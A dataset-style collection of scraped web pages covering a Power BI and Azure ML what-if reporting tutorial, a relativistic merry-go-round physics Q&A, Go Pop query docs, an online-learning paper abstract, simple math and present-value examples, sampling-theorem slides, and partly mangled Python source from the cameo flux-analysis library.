historic revenue in the data model and the hypothetical revenue amount, based on the average discount and price elasticity parameters. Below the line chart you will find the breakdown of both amounts in a drillable matrix visualization.", null, "In the top right-hand side corner are the two parameters Average discount (applied across all products) and Price elasticity. By changing these two parameters you will see the other visualizations’ measures beginning with “new” updating. While these are straightforward relationships this can be powerful to allow the report’s users to develop an intuitive understanding for the underlying sensitivities. Especially when there is little prior knowledge about the variation in inputs but the relationships between the inputs and relevant KPIs are well understood and modeled.\n\nOn the second page, Azure ML Studio real-time scoring, we are not inputting any assumptions but instead using slicers and Power BI’s filter functions to dynamically select a subset of the data model to be sent to our Predictive ML Studio experiment.", null, "The three slicers are followed by the Rviz which plots the actual revenue and the model’s predicted value. 
To the right of it is a normal line chart showing the historical values only. Unlike the previous page where we had to estimate elasticity this model was trained on all available data and uses the price points of the six products (P1-P6) to predict what the revenue would be. However, we are limited to only using real data for the scoring.\n\nOn the third page (What-If Analysis with Azure ML Studio) we have combined the previous two pages using both input parameters and real-time scoring. This allows us to test different price points per product with the Azure ML experiment. Just as on the previous page there is no need to estimate elasticity since the model has learnt this relationship through the historic data and by adding parameters for marketing campaigns etc. we can now assess the probable range of any scenario of interest.", null, "To create a scenario, start by selecting the regions, stores and products that you are interested in using the corresponding slicers. Then select the time interval that you are interested in (this could have been exclusively or partially future dates). By changing the planned price on the different products, you can then examine which combination has the highest expected revenue or profit. This model takes cross-price elasticities into account, i.e. if one product is a complement or supplement to another product a change in its price will also affect units sold for the other product. In summary, a powerful tool to quickly compare the average Azure ML Studio prediction of the impact of your scenario against the base case.\n\n## PAGE 1\n\nTo build what-if like dynamic reports in Power BI start by creating the parameters that the user should be able to input by clicking Modelling -> New Parameter in Power BI Desktop top menu.", null, "This prompts a form that asks for the new parameter’s name, e.g. “Average discount”, data type, min and max values, the granularity of the steps that the slider should use and an optional default value. When you click OK a new table will be created with a calculated column and corresponding measure. The column contains the DAX formula that generates the series and you can double-click on it at any time to change the settings for the parameter. Repeat this for all the parameters that you want to let the user alter to define the scenario. For categorical values, e.g. “Social campaign”, “Display ads”, “Email” you can either Enter data or reference a new or existing table in the Query editor and then displaying it with a slicer. The what-if parameters should typically not be connected to any other tables, so you need to use DAX to use them. In this example I did this with the measure:\n\n`New Units_sold = SUM(Sales[Units_sold])*(1+[Average discount Value]*[Price eleasticity Value])`\n\nwhich changes the baseline quantity of products sold (Sales[Units_sold]) by the discount parameter, weighted by the elasticity. The measure:\n\n`New price = DIVIDE(SUM(Sales[Revenue]),SUM(Sales[Units_sold]))*(1-[Average discount Value])`\n\ncalculates the current average price and the applies the average discount in the scenario to it. We can then use these two calculations to determine the new revenue:\n\n`New revenue = [New price]*[New Units_sold]`\n\nand then by adding these measures to our visualizations the report is complete allowing the user to immediately see the results of their inputs. 
For stochastic modelling you can use a randomization function like RAND() or Poisson.Dist() to determine for instance the probability of achieving a target based on the parameter input.\n\nBelow is an example of this first page, embedded as a publish to web report:\n\n## PAGE 2\n\nTo create the R based visuals on page 2 & 3, you will need an ML Studio based experiment that is deployed and the AzureML and ggplot2 R packages installed. Please note that since the AzureML R package uses networking capabilities it is not yet available in the service, i.e. only works on-premise.\n\nThese two visualizations are Power BI R script visuals that uses the R packages AzureML and ggplot2*. The former connects to an MLStudio experiment. For it to do that the scoring experiment needs to be exhaustively defined. In this example we will use the 1) Workspace ID and 2) Experiment name. In addition, the package needs the 3) Authentication information to be allowed to interact with the web service.\n\nYou can find the Workspace ID by signing in to studio.azureml.net and selecting the correct workspace from the top menu:", null, "You then select the SETTINGS tab from the left-hand side menu. The WORKSPACE ID is the fourth property from the top:", null, "Copy this information, e.g. to Notepad.\n\nTo get the AUTHORIZATION TOKENS click on the second tab in settings:", null, "And copy one of the tokens to a new row in your Notepad.\n\nThe last thing that you need is the exact name of the predictive experiment. Once you have published it, you can get this by clicking on WEB SERVICES in the left-hand side menu and then on the name of the experiment in the list and you will see something like:", null, "Copy the entire name, e.g. “pricingdevpoc [predictive exp.]” to your Notepad.\n\nNow that you have the required connection information it is time to add the visuals to Power BI. Open a pbix file with the relevant data (typically a subset of the data that you used to train your model on). On the page that you want to add the interactive scoring: insert a simple standard visual, like a table and add the columns that you want to send to MLStudio. Please note that MLStudio requires an exact schema so the column names, sequence and type have to be identical to what the Web service input expects. 
I would also recommend that you click on the arrow next to each column name in the Values section for the visual and select Don’t summarize, to ensure that it looks correct without any empty rows or text values mixed with numbers etc.\n\nOnce this has been validated convert the visual to an R visual and add the below script updated with your experiments connection information:", null, "The R script editor where you past the script is visible when you select the converted Rviz from the canvas:", null, "Update the below script* with your connection details and paste it into the R script editor:\n\n`## Set the workspace id`\n\n`wsid = \"paste your workspace id here within the quotation marks\"`\n\n`## Set the workspace authentication key`\n\n`auth = \"paste your authentication token here within the quotation marks \"`\n\n`## Input the name of the Experiment`\n\n`serviceName = \"paste your service’s name here within the quotation marks \"`\n\n`## Load the AzureML library if not previously installed: install.packages(\"AzureML\")`\n\n`library(\"AzureML\")`\n\n`## Create a reference to the workspace`\n\n`ws <- workspace(wsid,auth)`\n\n`## Create a reference to the experiment`\n\n`s <- services(ws, name = serviceName)`\n\n`## Send the dataset to the Azure ML web service for scoring and store the result in ds`\n\n`ds <- consume(s,dataset)`\n\n`## Aggregate the scores to a single value by month`\n\n`scores <- data.frame(Prediction = tapply(ds\\$Scored.Labels, ds\\$Month_ID, sum))`\n\n`## Aggregate the revenue to a single value by month (for comparison)`\n\n`revenue <- data.frame(Actuals = tapply(ds\\$Revenue, ds\\$Month_ID, sum))`\n\n`## Combine the two resulting vectors in the new data.frame timePlot`\n\n`timePlot <- cbind(scores, revenue)`\n\n`## Load the ggplot library if not previously installed: install.packages(\"ggplot2\")`\n\n`require(ggplot2)`\n\n`## Specify the data to plot and set the x-axis`\n\n`ggplot(data = timePlot, aes(x = 1:nrow(timePlot))) +`\n\n`## Plot the two lines`\n\n`geom_line(aes(y = Prediction, colour = 'Prediction')) +`\n\n`geom_line(aes(y = Actuals, colour = 'Actuals')) +`\n\n`## Rename the x and y axis`\n\n`xlab(\"Time\") +`\n\n`ylab(\"Result \\$\") +`\n\n`## Name the legend`\n\n`labs(colour=\"Legend\") +`\n\n`## Change the colors of the line`\n\n`scale_color_manual(values = c(\"green\", \"red\"))`", null, "After pasting it in the editor, click the Run script play button. If you see an error message, click See details. If the message is “there is no package called…” install the required package, e.g. install.packages(\"AzureML\") from your IDE for R, (RGui, RStudio etc.).\n\nOnce you have gotten this visual to work you can move on to creating a similar visualization which takes user defined parameters as input. Please see the beginning of this section for information on creating What-If parameters.\n\n## PAGE 3\n\nDuplicate the page that you just created and substitute the columns from the data model with the corresponding parameter. If the parameters have the same names as the input schema it should work. In my example on page three I’ve given the parameters slightly different names to what the schema expects. This can be fixed by renaming them at runtime in the Rscript*. 
Below are two examples of how to do this, by name and by position:\n\n`## Rename the columns according to the import schema`\n\n`## By name`\n\n`names(dataset)[names(dataset)==\"Product1 Price Value\"] <- \"P1\"`\n\n`## By position (the index values below are illustrative; match them to the position of each parameter column in your dataset)`\n\n`names(dataset)[2] <- \"P2\"`\n\n`names(dataset)[3] <- \"P3\"`\n\n`names(dataset)[4] <- \"P4\"`\n\n`names(dataset)[5] <- \"P5\"`\n\n`## Set the workspace id`\n\n`wsid = \"paste your workspace id here within the quotation marks\"`\n\n`## Set the workspace authentication key`\n\n`auth = \"paste your authentication token here within the quotation marks \"`\n\n`## Input the name of the Experiment`\n\n`serviceName = \"paste your service’s name here within the quotation marks \"`\n\n`## Load the AzureML library if not previously installed: install.packages(\"AzureML\")`\n\n`library(\"AzureML\")`\n\n`## Create a reference to the workspace`\n\n`ws <- workspace(wsid,auth)`\n\n`## Create a reference to the experiment`\n\n`s <- services(ws, name = serviceName)`\n\n`## Send the dataset to the Azure ML web service for scoring and store the result in ds`\n\n`ds <- consume(s,dataset)`\n\n`## Aggregate the scores to a single value by month`\n\n`scores <- data.frame(Prediction = tapply(ds\\$Scored.Labels, ds\\$Month_ID, sum))`\n\n`## Aggregate the revenue to a single value by month (for comparison)`\n\n`revenue <- data.frame(Actuals = tapply(ds\\$Revenue, ds\\$Month_ID, sum))`\n\n`## Combine the two results vectors in the new data.frame timePlot`\n\n`timePlot <- cbind(scores, revenue)`\n\n`## Load the ggplot library if not previously installed: install.packages(\"ggplot2\")`\n\n`require(ggplot2)`\n\n`labelNudge <- (max(scores) - min(scores))/15`\n\n`## Specify the data to plot and set the x-axis`\n\n`ggplot(data = timePlot, aes(x = 1:nrow(timePlot))) +`\n\n`## Plot the two lines`\n\n`geom_line(aes(y = Prediction, colour = 'Prediction')) +`\n\n`geom_line(aes(y = Actuals, colour = 'Base case')) +`\n\n`## Rename the x and y axis`\n\n`xlab(\"Time\") +`\n\n`ylab(\"Result \\$\") +`\n\n`## Name the legend`\n\n`labs(colour=\"Legend\") +`\n\n`## Change the colors of the lines`\n\n`scale_color_manual(values = c(\"blue\", \"red\")) +`\n\n`geom_text(aes(label = format(round(Prediction, digits = 0), big.mark = \",\", big.interval = 3L), y=Prediction), nudge_y = labelNudge)`\n\nThe other differences to the first Rscript are small layout changes." ]
https://van.physics.illinois.edu/qa/listing.php?id=1380
[ "# Q & A: relativistic merry-go-round\n\nQ:\nI’m not sure if you received this question. A ring has circumference = diameter * 3.14. Now, if this ring, laid flat atop a smooth surface, rotates with linear speed close to the speed of light, its circumference shrinks to close to zero. However, since there is no motion in the diametric direction, its diameter remains unchanged. How could a ring, on a flat surface, have circumference less than diameter * 3.14? To better visualize this situation, we can start by drawing a circle on the surface right below the ring before the rotation starts. Now the question becomes: How could the rotating ring have the same diameter as the circle but less circumference?\n- Mehran (age 53)\nLisle, Illinois\nA:\nMehran- This is a familiar example, used by Einstein to help introduce General Relativity. Let's look at this rotating disk from two points of view- the point of view of someone standing on the ground and that of someone on the disk. We'll assume that the geometry from the ground point of view has all the normal geometrical properties that we're used to. Now if by 'circumference' we mean the length that the ground observer traces out in the dirt directly below the rim of the spinning disk, it is obviously pi* diameter, where diameter is the distance across that circle. You may wonder how that can be since the moving parts of the disk are Lorentz contracted, but there are all sorts of other stresses etc in a spinning disk, so it stretches some, and we simply know that Euclid's geometry works well to describe any figures under ordinary circumstances in our standard frames. Remember, we don't have to worry about how fast the disk is spinning because we're making measurements on the part of the ground that almost touches the disk.\n\nNow how do things look for someone making measurements on the disk? As you say, if he measures the diameter by laying out meter sticks in a standard way, he'll get the same length as we get, because those meter sticks are not moving lengthwise with respect to us and hence are not Lorentz contracted lengthwise. However, the meter sticks used to measure the circumference, along the rim, ARE Lorentz contracted, so it takes MORE than pi*diameter of them to cover the rim. So unless you were to for some reason pick a different, longer, path to measure the diameter, you end up with the circumference/diameter ratio being MORE than pi in the frame of the spinning disk. Of course, you might choose some other path, like that followed by a light ray, and get a longer diameter.\n\nSo the answer is that if you pick odd frames like that of the disk, with different parts accelerating different ways, you can't use the standard Euclidean geometry of space-time. The weird thing is that if gravity is present, it mimics non-uniform acceleration. So, strictly speaking, the simple frames we started with don't exist, but the world can come close to behaving that way. For the Earth, the circumference is short of what we would expect for Euclidean geometry by only about an inch.\n\nMike W.\n\nThe observer on the rim of the disk can get a different answer depending on how the circumference of the disk is measured. If the whirling observer on a disk whose rim is traveling close to the speed of light observes how fast the dirt is going by underneath, using his own meter stick and clock, he will get the answer that he is going at close to the speed of light. 
If he measures the time it takes on his clock to make one revolution (by looking at a mark in the dirt, say), and he multiplies that by his speed, he will get an answer that is less than pi*diameter. This is a weird quantity because it is not measured in a single frame of reference. The whirling observer accelerates constantly, and this is the sum of lots of little pieces measured in a succession of uniformly moving frames of reference.\n\nThis situation has practical consequences. Storing a large number of bunches of charged particles in a circular storage ring and then accelerating them to high energies involves this effect. Typically, the rings of magnets in a modern synchrotron are fixed in radius and the radio-frequency cavities are fixed in frequency and their spacing. The charged particles travel at nearly the speed of light all the time, so their travel times do not change much as the energy is raised from immense to really immense. Nor does the spacing of the bunches around the ring. What changes though, is that in one moving bunch's frame, the neighboring bunches get farther apart as the energy is increased. This has an effect on the electrostatic force one bunch exerts on another as the energy increases (they go down; real accelerators have more troubles with residual electromagnetic fields oscillating in the metal beampipe). In the frame of one of the bunches, the distance to the next has increased, but the same number of bunches stay equally spaced around the ring, so the whirling observer thinks the circumference has increased. But, paradoxically, it takes less of his time to go around that circle at approximately the same speed. (This is observed when putting particles with known lifetimes, such as muons, into these storage rings -- they make more turns around the ring on average before decaying).\n\nTom\n\n(published on 10/22/2007)" ]
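To put numbers behind the two measurements described above, here is a compact worked version (a sketch only; the symbols R for the ring's radius, v for the rim speed, and γ for the Lorentz factor are introduced here for illustration and are not in the original answer):

$$
\gamma=\frac{1}{\sqrt{1-v^{2}/c^{2}}},\qquad
\frac{C_{\mathrm{ground}}}{D}=\frac{2\pi R}{2R}=\pi,\qquad
\frac{C_{\mathrm{rim\ sticks}}}{D}=\frac{\gamma\,2\pi R}{2R}=\gamma\pi>\pi,\qquad
v\,t_{\mathrm{rider}}=v\,\frac{2\pi R/v}{\gamma}=\frac{2\pi R}{\gamma}<\pi D .
$$

The first ratio is the ground-frame statement, the second is the rim-meter-stick count described by Mike W., and the last expression is the mixed-frame quantity Tom describes, which comes out smaller than pi times the diameter.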
https://gobuffalo.io/en/docs/db/querying
[ "# Querying\n\nIn this chapter, you'll learn how to retrieve data from your database using Pop.\n\n### Find By ID\n\n```user := User{}\nerr := db.Find(&user, id)\n```\n\n### Find All\n\n```users := []User{}\nerr := db.All(&users)\nerr = db.Where(\"id in (?)\", 1, 2, 3).All(&users)\n```\n\n### Find All with Order\n\n```// To retrieve records from the database in a specific order, you can use the Order method\nusers := []User{}\nerr := db.Order(\"id desc\").All(&users)\n```\n\n#### Find Last\n\n```// Last() orders by created_at\nuser := models.User{}\nerr := tx.Last(&user)\n```\n\n### Find Where\n\n```users := []models.User{}\nquery := db.Where(\"id = 1\").Where(\"name = 'Mark'\")\nerr := query.All(&users)\n\nerr = tx.Where(\"id in (?)\", 1, 2, 3).All(&users)\n```\n\n#### Using `in` Queries\n\n```err = db.Where(\"id in (?)\", 1, 2, 3).All(&users)\nerr = db.Where(\"id in (?)\", 1, 2, 3).Where(\"foo = ?\", \"bar\").All(&users)\n```\n\nUnfortunately, for a variety of reasons you can't use an `and` query in the same `Where` call as an `in` query.\n\n```// does not work:\nerr = db.Where(\"id in (?) and foo = ?\", 1, 2, 3, \"bar\").All(&users)\n// works:\nerr = db.Where(\"id in (?)\", 1, 2, 3).Where(\"foo = ?\", \"bar\").All(&users)\n```\n\n### Select specific columns\n\n`Select` allows you to load specific columns from a table. Useful when you don't want all columns from a table to be loaded in a query.\n\n```err = db.Select(\"name\").All(&users)\n// SELECT name FROM users\n\nerr = db.Select(\"max(age)\").All(&users)\n// SELECT max(age) FROM users\n\nerr = db.Select(\"age\", \"name\").All(&users)\n// SELECT age, name FROM users\n```\n\n### Join Query\n\n```// page: page number\n// perpage: limit\nroles := []models.UserRole{}\nquery := models.DB.LeftJoin(\"roles\", \"roles.id=user_roles.role_id\").\nLeftJoin(\"users u\", \"u.id=user_roles.user_id\").\nWhere(`roles.name like ?`, name).Paginate(page, perpage)\n\ncount, _ := query.Count(models.UserRole{})\ncount, _ = query.CountByField(models.UserRole{}, \"*\")\nsql, args := query.ToSQL(&pop.Model{Value: models.UserRole{}}, \"user_roles.*\",\n\"roles.name as role_name\", \"u.first_name\", \"u.last_name\")\nerr := models.DB.RawQuery(sql, args...).All(&roles)\n```" ]
https://virtual.aistats.org/virtual/2021/poster/1845
[ "## Power of Hints for Online Learning with Movement Costs\n\n### Aditya Bhaskara · Ashok Cutkosky · Ravi Kumar · Manish Purohit\n\nKeywords: [ Online Learning ] [ Learning Theory and Statistics ]\n\nAbstract: We consider the online linear optimization problem with movement costs, a variant of online learning in which the learner must not only respond to cost vectors $c_t$ with points $x_t$ in order to maintain low regret, but is also penalized for movement by an additional cost $\\|x_t-x_{t+1}\\|^{1+\\epsilon}$ for some $\\epsilon>0$. Classically, simple algorithms that obtain the optimal $\\sqrt{T}$ regret already are very stable and do not incur a significant movement cost. However, recent work has shown that when the learning algorithm is provided with weak 'hint' vectors that have a positive correlation with the costs, the regret can be significantly improved to $\\log(T)$. In this work, we study the stability of such algorithms, and provide matching upper and lower bounds showing that incorporating movement costs results in intricate tradeoffs between $\\log(T)$ when $\\epsilon\\ge 1$ and $\\sqrt{T}$ regret when $\\epsilon=0$." ]
https://answers.everydaycalculation.com/add-fractions/9-4-plus-8-9
[ "Solutions by everydaycalculation.com\n\n1st number: 2 1/4, 2nd number: 8/9\n\n9/4 + 8/9 is 113/36.\n\n1. Find the least common denominator or LCM of the two denominators:\nLCM of 4 and 9 is 36\n\nNext, find the equivalent fraction of both fractional numbers with denominator 36\n2. For the 1st fraction, since 4 × 9 = 36,\n9/4 = (9 × 9)/(4 × 9) = 81/36\n3. Likewise, for the 2nd fraction, since 9 × 4 = 36,\n8/9 = (8 × 4)/(9 × 4) = 32/36\n4. Add the two like fractions:\n81/36 + 32/36 = (81 + 32)/36 = 113/36\n5. So, 9/4 + 8/9 = 113/36\nIn mixed form: 3 5/36" ]
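For readers who want to check such sums programmatically, here is a small sketch of the same least-common-denominator method (the function names are ours, not from the calculator site):

```python
from math import gcd

def add_fractions(n1, d1, n2, d2):
    """Add n1/d1 + n2/d2 using the least common denominator."""
    lcm = d1 * d2 // gcd(d1, d2)                # LCM of 4 and 9 is 36
    num = n1 * (lcm // d1) + n2 * (lcm // d2)   # 81 + 32 = 113
    return num, lcm

def to_mixed(num, den):
    """Convert an improper fraction to (whole part, remainder numerator, denominator)."""
    return num // den, num % den, den

num, den = add_fractions(9, 4, 8, 9)
print(f"{num}/{den}")        # 113/36
print(to_mixed(num, den))    # (3, 5, 36), i.e. 3 5/36
```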
https://gas-dd.sagepub.com/lp/springer-journals/a-solution-to-parabolic-system-with-the-fractional-laplacian-rVAx5SW0yM
[ "# A solution to parabolic system with the fractional Laplacian\n\nApplied Mathematics-A Journal of Chinese Universities, Springer Journals, Volume 24 (2) – Jun 10, 2009, 7 pages\n\nPublisher\nSpringer Journals\nCopyright © 2009 by Editorial Committee of Applied Mathematics-A Journal of Chinese Universities and Springer-Verlag GmbH\nSubject\nMathematics; Applications of Mathematics; Mathematics, general\nISSN\n1005-1031\neISSN\n1993-0445\nDOI\n10.1007/s11766-009-2084-5\n\n### Abstract\n\nThe existence of a solution to the parabolic system with the fractional Laplacian (−Δ)^(α/2), α > 0, is proven; this solution decays at different rates along different time sequences going to infinity. As an application, the existence of a solution to the generalized Navier-Stokes equations is proven, which decays at different rates along different time sequences going to infinity. The generalized Navier-Stokes equations are the equations resulting from replacing −Δ in the Navier-Stokes equations by (−Δ)^m, m > 0. At last, a similar result for the 3-D incompressible anisotropic Navier-Stokes system is obtained.\n\n### Journal\n\nApplied Mathematics-A Journal of Chinese Universities, Springer Journals\n\nPublished: Jun 10, 2009" ]
http://cameo.bio/_modules/cameo/flux_analysis/util.html
[ "# Source code for cameo.flux_analysis.util\n\n# -*- coding: utf-8 -*-\n# Copyright 2014 Novo Nordisk Foundation Center for Biosustainability, DTU.\n#\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#\n# Unless required by applicable law or agreed to in writing, software\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n\nfrom cobra.exceptions import OptimizationError\n\nimport sympy\n\nimport logging\n\n__all__ = ['remove_infeasible_cycles', 'fix_pfba_as_constraint']\n\nFloatOne = sympy.Float(1)\nlogger = logging.getLogger(__name__)\n\n[docs]def remove_infeasible_cycles(model, fluxes, fix=()):\n\"\"\"Remove thermodynamically infeasible cycles from a flux distribution.\n\nParameters\n---------\nmodel : cobra.Model\nThe model that generated the flux distribution.\nfluxes : dict\nThe flux distribution containing infeasible loops.\n\nReturns\n-------\ndict\nA cycle free flux distribution.\n\nReferences\n----------\n.. \tA. A. Desouki, F. Jarre, G. Gelius-Dietrich, and M. J. Lercher, “CycleFreeFlux: efficient removal of\nthermodynamically infeasible loops from flux distributions.”\n\"\"\"\nwith model:\n# make sure the original object is restored\nexchange_reactions = model.boundary\nexchange_ids = [exchange.id for exchange in exchange_reactions]\ninternal_reactions = [reaction for reaction in model.reactions if reaction.id not in exchange_ids]\nfor exchange in exchange_reactions:\nexchange_flux = fluxes[exchange.id]\nexchange.bounds = (exchange_flux, exchange_flux)\ncycle_free_objective_list = []\nfor internal_reaction in internal_reactions:\ninternal_flux = fluxes[internal_reaction.id]\nif internal_flux >= 0:\ncycle_free_objective_list.append(Mul._from_args((FloatOne, internal_reaction.forward_variable)))\ninternal_reaction.bounds = (0, internal_flux)\nelse: # internal_flux < 0:\ncycle_free_objective_list.append(Mul._from_args((FloatOne, internal_reaction.reverse_variable)))\ninternal_reaction.bounds = (internal_flux, 0)\ncycle_free_objective = model.solver.interface.Objective(\n)\nmodel.objective = cycle_free_objective\n\nfor reaction_id in fix:\nreaction_to_fix = model.reactions.get_by_id(reaction_id)\nreaction_to_fix.bounds = (fluxes[reaction_id], fluxes[reaction_id])\ntry:\nsolution = model.optimize(raise_error=True)\nexcept OptimizationError as e:\nlogger.warning(\"Couldn't remove cycles from reference flux distribution.\")\nraise e\nresult = solution.fluxes\nreturn result\n\n[docs]def fix_pfba_as_constraint(model, multiplier=1, fraction_of_optimum=1):\n\"\"\"Fix the pFBA optimum as a constraint\n\nUseful when setting other objectives, like the maximum flux through given reaction may be more realistic if all\nother fluxes are not allowed to reach their full upper bounds, but collectively constrained to max sum.\n\nParameters\n----------\nmodel : cobra.Model\nThe model to add the pfba constraint to\nmultiplier : float\nThe multiplier of the minimal sum of all reaction fluxes to use as the constraint.\nfraction_of_optimum : float\nThe fraction of the objective value's optimum to use as constraint when getting the pFBA objective's minimum\n\"\"\"\n\nfix_constraint_name = '_fixed_pfba_constraint'\nif fix_constraint_name in model.solver.constraints:\nmodel.solver.remove(fix_constraint_name)\nwith model:" ]
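A minimal usage sketch for the two helpers defined above (a hypothetical example, not part of the cameo source: the model identifier, the pinned reaction id, and the variable names are placeholders chosen for illustration):

```python
# Hypothetical usage of cameo.flux_analysis.util; a sketch, not from the library docs.
from cameo import load_model
from cameo.flux_analysis.util import remove_infeasible_cycles, fix_pfba_as_constraint

model = load_model("iJO1366")            # placeholder model identifier

# Reference flux distribution from a plain FBA solve.
solution = model.optimize()
fluxes = solution.fluxes.to_dict()

# Remove thermodynamically infeasible loops (CycleFreeFlux); optionally pin reactions via `fix`.
cycle_free_fluxes = remove_infeasible_cycles(model, fluxes, fix=("ATPM",))

# Fix the pFBA optimum as a constraint before optimizing some other objective.
with model:
    fix_pfba_as_constraint(model, multiplier=1, fraction_of_optimum=1)
    constrained_solution = model.optimize()
```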
https://studyfinance.com/present-value/11-in-17-years/
[ "# Present Value of $11 in 17 Years\n\nWhen you have a single payment that will be made to you, in this case $11, and you know that it will be paid in a certain number of years, in this case 17 years, you can use the present value formula to calculate what that $11 is worth today. Below is the present value formula we'll use to calculate the present value of $11 in 17 years.\n\n$$Present\\: Value = \\dfrac{FV}{(1 + r)^{n}}$$\n\nWe already have two of the three required variables to calculate this:\n\n• Future Value (FV): This is the $11\n• n: This is the number of periods, which is 17 years\n\nSo what we need to know now is r, which is the discount rate (or rate of return) to apply. It's worth noting that there is no correct discount rate to use here. It's a very personal number that can vary depending on the risk of your investments. For example, if you invest in the market and you earn on average 8% per year, you can use that number for the discount rate. You can also use a lower discount rate, based on the US Treasury ten year rate, or some average of the two. The table below shows the present value (PV) of $11 paid in 17 years for interest rates from 2% to 30%.\n\nAs you will see, the present value of $11 paid in 17 years can range from $0.13 to $7.86.\n\nDiscount Rate | Future Value | Present Value\n2% | $11 | $7.86\n3% | $11 | $6.66\n4% | $11 | $5.65\n5% | $11 | $4.80\n6% | $11 | $4.09\n7% | $11 | $3.48\n8% | $11 | $2.97\n9% | $11 | $2.54\n10% | $11 | $2.18\n11% | $11 | $1.87\n12% | $11 | $1.60\n13% | $11 | $1.38\n14% | $11 | $1.19\n15% | $11 | $1.02\n16% | $11 | $0.88\n17% | $11 | $0.76\n18% | $11 | $0.66\n19% | $11 | $0.57\n20% | $11 | $0.50\n21% | $11 | $0.43\n22% | $11 | $0.37\n23% | $11 | $0.33\n24% | $11 | $0.28\n25% | $11 | $0.25\n26% | $11 | $0.22\n27% | $11 | $0.19\n28% | $11 | $0.17\n29% | $11 | $0.14\n30% | $11 | $0.13\n\nAs mentioned above, the discount rate is highly subjective and will have a big impact on the actual present value of $11. A 2% discount rate gives a present value of $7.86 while a 30% discount rate would mean a $0.13 present value.\n\nThe rate you choose should be somewhat equivalent to the expected rate of return you'd get if you invested $11 over the next 17 years. Since this is hard to calculate, especially over longer periods of time, it is often useful to look at a range of present values (from 5% discount rate to 10% discount rate, for example) when making decisions.\n\nHopefully this article has helped you to understand how to make present value calculations yourself. You can also use our quick present value calculator for specific numbers." ]
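The table values above are easy to reproduce; a quick sketch of the calculation:

```python
# Present value of a single future payment: PV = FV / (1 + r)**n
FV, n = 11, 17

for pct in range(2, 31):
    r = pct / 100
    pv = FV / (1 + r) ** n
    print(f"{pct}%\t${pv:.2f}")   # e.g. the 8% row prints $2.97, matching the table
```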
https://slideplayer.com/slide/6240987/
[ "# … Representation of a CT Signal Using Impulse Functions\n\n## Presentation on theme: \"… Representation of a CT Signal Using Impulse Functions\"— Presentation transcript:\n\nLECTURE 15: THE SAMPLING THEOREM\nObjectives: Representation Using Impulses FT of a Sampled Signal Signal Reconstruction Signal Interpolation Aliasing Multirate Signal Processing Resources: Wiki: Nyquist Sampling Theorem CNX: The Sampling Theorem CNX: Downsampling\n\n… Representation of a CT Signal Using Impulse Functions\nThe goal of this lecture is to convince you that bandlimited CT signals, when sampled properly, can be represented as discrete-time signals with NO loss of information. This remarkable result is known as the Sampling Theorem. Recall our expression for a pulse train: A sampled version of a CT signal, x(t), is: This is known as idealized sampling. We can derive the complex Fourier series of a pulse train. [figure: a CT signal x(t) and its sampled version, with samples at t = …, -2T, -T, 0, T, 2T, …]\n\nFourier Transform of a Sampled Signal\nThe Fourier series of our sampled signal, xs(t) is: Recalling the Fourier transform properties of linearity (the transform of a sum is the sum of the transforms) and modulation (multiplication by a complex exponential produces a shift in the frequency domain), we can write an expression for the Fourier transform of our sampled signal: If our original signal, x(t), is bandlimited:\n\nSignal Reconstruction\nNote that if , the replicas of do not overlap in the frequency domain. We can recover the original signal exactly. The sampling frequency, , is referred to as the Nyquist sampling frequency. There are two practical problems associated with this approach: The lowpass filter is not physically realizable. Why? The input signal is typically not bandlimited. Explain.\n\nSignal Interpolation The frequency response of the lowpass, or interpolation, filter is: The impulse response of this filter is given by: The output of the interpolating filter is given by the convolution integral: Using the sifting property of the impulse:\n\nSignal Interpolation (Cont.)\nInserting our expression for the impulse response: This has an interesting graphical interpretation shown to the right. This formula describes a way to perfectly reconstruct a signal from its samples. Applications include digital to analog conversion, and changing the sample frequency (or period) from one value to another, a process we call resampling (up/down). But remember that this is still a noncausal system so in practical systems we must approximate this equation. Such implementations are studied more extensively in an introductory DSP class.\n\nAliasing Recall that a time-limited signal cannot be bandlimited. Since all signals are more or less time-limited, they cannot be bandlimited. Therefore, we must lowpass filter most signals before sampling. This is called an anti-aliasing filter and is typically built into an analog to digital (A/D) converter. If the signal is not bandlimited, distortion will occur when the signal is sampled. We refer to this distortion as aliasing: How was the sample frequency for CDs and MP3s selected?\n\nSampling of Narrowband Signals\nWhat is the lowest sample frequency we can use for the narrowband signal shown to the right? Recalling that the process of sampling shifts the spectrum of the signal, we can derive a generalization of the Sampling Theorem in terms of the physical bandwidth occupied by the signal. A general guideline is , where B = B2 – B1. 
A more rigorous equation depends on B1 and B2. Sampling can also be thought of as a modulation operation, since it shifts a signal’s spectrum in frequency.\n\nUndersampling and Oversampling of a Signal\n\nSampling is a Universal Engineering Concept\nNote that the concept of sampling is applied to many electronic systems: electronics: CD players, switched capacitor filters, power systems; biological systems: EKG, EEG, blood pressure; information systems: the stock market. Sampling can be applied in space (e.g., images) as well as time, as shown to the right. Full-motion video signals are sampled spatially (e.g., 1280x1024 pixels at 100 pixels/inch), temporally (e.g., 30 frames/sec), and with respect to color (e.g., RGB at 8 bits/color). How were these settings arrived at?\n\nDownsampling and Upsampling\nSimple sample rate conversions, such as converting from 16 kHz to 8 kHz, can be achieved using digital filters and zero-stuffing:\n\nOversampling Sampling and digital signal processing can be combined to create higher performance samplers. For example, CD players use an oversampling approach that involves sampling the signal at a very high rate and then downsampling it to avoid the need to build high-precision converters and filters.\n\nSummary Introduced the Sampling Theorem and discussed the conditions under which analog signals can be represented as discrete-time signals with no loss of information. Discussed the spectrum of a discrete-time signal. Demonstrated how to reconstruct and interpolate a signal using sinc functions that are a consequence of the Sampling Theorem. Introduced a variety of applications involving sampling including downsampling and oversampling." ]
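As a numerical companion to the sinc-interpolation formula discussed in the slides above, the short sketch below reconstructs a bandlimited tone from its samples (the 50 Hz tone and 400 Hz sampling rate are arbitrary illustrative choices):

```python
import numpy as np

f0, fs = 50.0, 400.0                      # tone frequency and sample rate (fs > 2*f0)
T = 1.0 / fs                              # sampling period
n = np.arange(32)                         # sample indices
x_n = np.sin(2 * np.pi * f0 * n * T)      # idealized samples x(nT)

# Truncated sinc interpolation: x(t) ~= sum_n x(nT) * sinc((t - n*T)/T),
# where np.sinc(u) = sin(pi*u)/(pi*u).
t = np.linspace(0.01, 0.06, 500)          # stay away from the ends of the sample block
x_hat = np.array([np.sum(x_n * np.sinc((ti - n * T) / T)) for ti in t])

max_err = np.max(np.abs(x_hat - np.sin(2 * np.pi * f0 * t)))
print(f"max reconstruction error on this interval: {max_err:.3f}")
```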
https://safecurves.cr.yp.to/proof/4975457.html
